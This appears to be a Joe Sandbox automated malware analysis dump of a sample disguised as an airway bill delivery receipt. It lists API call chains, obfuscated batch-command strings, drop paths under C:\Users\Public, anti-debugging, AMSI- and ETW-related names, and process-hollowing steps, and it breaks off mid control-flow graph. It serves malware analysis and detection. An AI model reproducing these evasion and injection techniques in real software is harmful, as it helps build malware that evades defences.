                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                    • API String ID: 3503870465-2520021413
                                                                                                    • Opcode ID: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
                                                                                                    • Instruction ID: 69fc646870e9092b993a3bdddb9d1549ecd64cb4deb4f9dfdd0ea1fbec644f1f
                                                                                                    • Opcode Fuzzy Hash: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
                                                                                                    • Instruction Fuzzy Hash: A4016275654304BFEB02EFA8DC41E5EB7BEEB49710F5288A0B40897A11DA34AA05CE21
                                                                                                    Function 02B3D9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                    • NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1459852867-0
                                                                                                    • Opcode ID: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
                                                                                                    • Instruction ID: 1b2d0c54559cd3be78886de77d0b244fd6553f64d518f05bd122c25809ee05c3
                                                                                                    • Opcode Fuzzy Hash: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
                                                                                                    • Instruction Fuzzy Hash: C6016275948349BEEF06EBE0CA41BCD77BDAB44704F5045D2E360E6081DA74AB08CB21
                                                                                                    Function 02B3DA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                    • NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                      • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694942484-0
                                                                                                    • Opcode ID: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
                                                                                                    • Instruction ID: 18942b3dffc62d91750dd9baa2dc03d894410d6f9356a24cfd5d7173708cf0fd
                                                                                                    • Opcode Fuzzy Hash: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
                                                                                                    • Instruction Fuzzy Hash: C0014F71A04309BAEB11EBE0CD42FCEB7BDEB08700F5045E1E614E2590EB74AB088A60
                                                                                                    Function 02B36D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B36CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,02B36E2C,00000000,00000000,02B36DAB,?,00000000,02B36E1B), ref: 02B36D97
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                    • String ID:
                                                                                                    • API String ID: 2151042543-0
                                                                                                    • Opcode ID: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
                                                                                                    • Instruction ID: a3673d327e5ae6c5dd63de9fef6e45ba355575fb2bb925006226a1eca47235a8
                                                                                                    • Opcode Fuzzy Hash: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
                                                                                                    • Instruction Fuzzy Hash: 60014230208314BEE716EF60CC2296FBBFDE749B10B9208B5F405D2650E6308D08C868
                                                                                                    Function 02B3EC6C Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InetIsOffline.URL(00000000,00000000,02B4AF99,?,?,?,000002F7,00000000,00000000), ref: 02B3ECA6
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                      • Part of subcall function 02B3EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
                                                                                                      • Part of subcall function 02B3EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4
                                                                                                      • Part of subcall function 02B3EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
                                                                                                      • Part of subcall function 02B3EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
                                                                                                      • Part of subcall function 02B3EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21
                                                                                                      • Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                      • Part of subcall function 02B2C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C758C8,?,02B3FBF6,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession), ref: 02B2C2FB
                                                                                                      • Part of subcall function 02B3DBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
                                                                                                      • Part of subcall function 02B3DBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
                                                                                                      • Part of subcall function 02B3DBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
                                                                                                      • Part of subcall function 02B3DBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
                                                                                                      • Part of subcall function 02B3DBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D
                                                                                                      • Part of subcall function 02B27E34: GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F
                                                                                                      • Part of subcall function 02B27FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B42BDF,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0), ref: 02B27FD5
                                                                                                      • Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                      • Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                      • Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                      • Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                      • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                      • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                      • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                      • Part of subcall function 02B38704: LoadLibraryW.KERNEL32(amsi), ref: 02B3870D
                                                                                                      • Part of subcall function 02B38704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C
                                                                                                    • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,02B4B328), ref: 02B449AF
                                                                                                      • Part of subcall function 02B3DA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                      • Part of subcall function 02B3DA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                      • Part of subcall function 02B3DA3C: NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44BAF
                                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44C05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                    • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                    • API String ID: 2010126900-181751239
                                                                                                    • Opcode ID: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
                                                                                                    • Instruction ID: 6d4ca2bb19920ed03925f197ca0d8a346f314e3bc2c78c9ac32b883bb2ca8568
                                                                                                    • Opcode Fuzzy Hash: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
                                                                                                    • Instruction Fuzzy Hash: FC24F975A502688FDB12EB64DD80ADE73B6BF84300F1045E6E50DABA14DE30AE8DDF51
                                                                                                    Function 02B47870 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5348 2b47870-2b47c5f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24898 5463 2b47c65-2b47e38 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24798 call 2b2494c call 2b24d20 call 2b24d9c CreateProcessAsUserW 5348->5463 5464 2b48ae9-2b48c6c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24898 5348->5464 5573 2b47eb6-2b47fc1 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5463->5573 5574 2b47e3a-2b47eb1 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5463->5574 5553 2b48c72-2b48c81 call 2b24898 5464->5553 5554 2b49418-2b4aa1d call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c * 16 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b37b90 call 2b38184 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c ExitProcess 5464->5554 5553->5554 5563 2b48c87-2b48f5a call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3e538 call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b27e10 5553->5563 5821 2b48f60-2b4920d call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c * 2 call 2b24734 call 2b3dac4 5563->5821 5822 2b49212-2b49413 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b249a4 call 2b38ba8 5563->5822 5674 2b47fc3-2b47fc6 5573->5674 5675 2b47fc8-2b482e8 call 2b249a4 call 2b3dc88 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3cf9c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5573->5675 5574->5573 5674->5675 5988 2b48301-2b48ae4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c ResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 